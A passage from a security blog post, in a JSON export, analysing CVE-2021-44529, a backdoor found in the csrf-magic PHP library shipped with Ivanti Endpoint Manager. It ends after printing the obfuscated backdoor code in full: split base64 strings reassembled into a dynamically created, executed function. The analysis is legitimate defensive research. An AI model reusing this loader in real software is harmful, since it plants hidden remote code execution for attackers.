{"id":55389,"date":"2024-02-21T15:53:58","date_gmt":"2024-02-21T15:53:58","guid":{"rendered":"https:\/\/packetstormsecurity.com\/news\/view\/35564\/Code-Injection-Or-Backdoor-A-New-Look-At-Ivantis-CVE-2021-44529.html"},"modified":"2024-02-21T15:53:58","modified_gmt":"2024-02-21T15:53:58","slug":"code-injection-or-backdoor-a-new-look-at-ivantis-cve-2021-44529","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/code-injection-or-backdoor-a-new-look-at-ivantis-cve-2021-44529\/","title":{"rendered":"Code Injection Or Backdoor: A New Look At Ivanti’s CVE-2021-44529"},"content":{"rendered":"
<\/div>\n


\n

This is yet another, \u201cRon got nerdsniped by a thing and wasted enough time that he needs something to show for it\u201d blog. Which, come to think of it, are pretty much all my blogs. \ud83d\ude42<\/p>\n

Awhile back, a tweet from Steven Seeley<\/a> (\u03fb\u0433_\u03fb\u03b5) caught my eye – an exploit for an issue mentioned in a tweet from nearly two years ago<\/a>. The tweets link to an Ivanti Endpoint Manager advisory from 2021<\/a> and an exploit from 2022<\/a>. The vulnerability is identified as CVE-2021-44529. I wasn\u2019t aware of any of this, but I immediately got curious!<\/p>\n

While finalizing this blog, I found this AttackerKB post from h00die-gr3y<\/a> that covers the exact same material in roughly the same way. So if you don\u2019t like my writing, go read that one \ud83d\ude42<\/p>\n

\n

The software<\/h2>\n

In the thread, Tuan Anh Nguyen (@haxor31337<\/span>) mentioned it\u2019s a backdoor in csrf-magic<\/a>. I googled csrf-magic backdoor<\/code>, but found nothing except for that tweet. The tweet links to the project<\/a>, but the project is dead and gone.<\/p>\n

Every once in awhile, I remember that the Way Back Machine exists and is an invaluable resource! So I threw the URL into the search box and there it was – the backdoored file<\/a>! That archive is from March\/2022, but the last commit was from February\/2014 (if you\u2019re doing the math, the advisory came out 7 years after<\/em> the last commit).<\/p>\n

I found a fork of csrf-magic<\/code>, but there\u2019s no sign of the commit. I\u2019d be very curious as to the provenance of that commit, whether any other software was affected, and just how long Ivanti Endpoint Manager was affected, but all the information seems to have been stuffed down the memory hole!<\/p>\n<\/section>\n

\n

Level 1: De-obfuscating the backdoor<\/h2>\n

So I started reading the code, looking carefully for the backdoor. I thought it\u2019d be carefully hidden, disguised as legit code somewhere in one of the functions. Eventually, I got to the bottom of the file and found:<\/p>\n

\n
\/\/ Obscure Tokens<\/span><\/span>\n$aeym<\/span>=<\/span>\"RlKHfsByZWdfcmVwfsbGFjZShhcnJheSgnLfs1teXHc9fsXHNdLyfscsJy9fsccy8nfsKSwgYXJyfsYXkoJycsfsJysn\"<\/span>;<\/span><\/span>\n$lviw<\/span> =<\/span> str_replace<\/span>(\"m\"<\/span>,<\/span>\"\"<\/span>,<\/span>\"msmtmr_mrmemplmamcme\"<\/span>);<\/span><\/span>\n$bbhj<\/span>=<\/span>\"JGMofsJGEpPjMpefsyRrPSdjMTIzJzfstlfsY2hvICc8Jy4kay4nPic7ZXfsZfshbChiYXNlNjRfZGVjb2\"<\/span>;<\/span><\/span>\n$hpbk<\/span>=<\/span>\"fsJGfsM9fsJ2NvdW50fsJzfsskYfsT0kXfs0NPT0tJRTtpZihyfsZfsXNldfsCgfskYfsSkfs9fsPSdhYicgJiYg\"<\/span>;<\/span><\/span>\n$rvom<\/span>=<\/span>\"KSwgam9pbihhcnfsJheV9zbGljZSgkYSwkYyfsgkYSktMyfskpfsKSkpOfs2VjaG8gJzwvJy4fskay4nPic7fQ==\"<\/span>;<\/span><\/span>\n$xytu<\/span> =<\/span> $lviw<\/span>(\"oc\"<\/span>,<\/span> \"\"<\/span>,<\/span> \"ocbocaocseoc6oc4_ocdoceoccocoocdoce\"<\/span>);<\/span><\/span>\n$murp<\/span> =<\/span> $lviw<\/span>(\"k\"<\/span>,<\/span>\"\"<\/span>,<\/span>\"kckrkeaktkek_kfkunkcktkikokn\"<\/span>);<\/span><\/span>\n$zmto<\/span> =<\/span> $murp<\/span>(''<\/span>,<\/span> $xytu<\/span>($lviw<\/span>(\"fs\"<\/span>,<\/span> \"\"<\/span>,<\/span> $hpbk<\/span>.<\/span>$bbhj<\/span>.<\/span>$aeym<\/span>.<\/span>$rvom<\/span>)));<\/span> $zmto<\/span>();<\/span><\/span><\/code>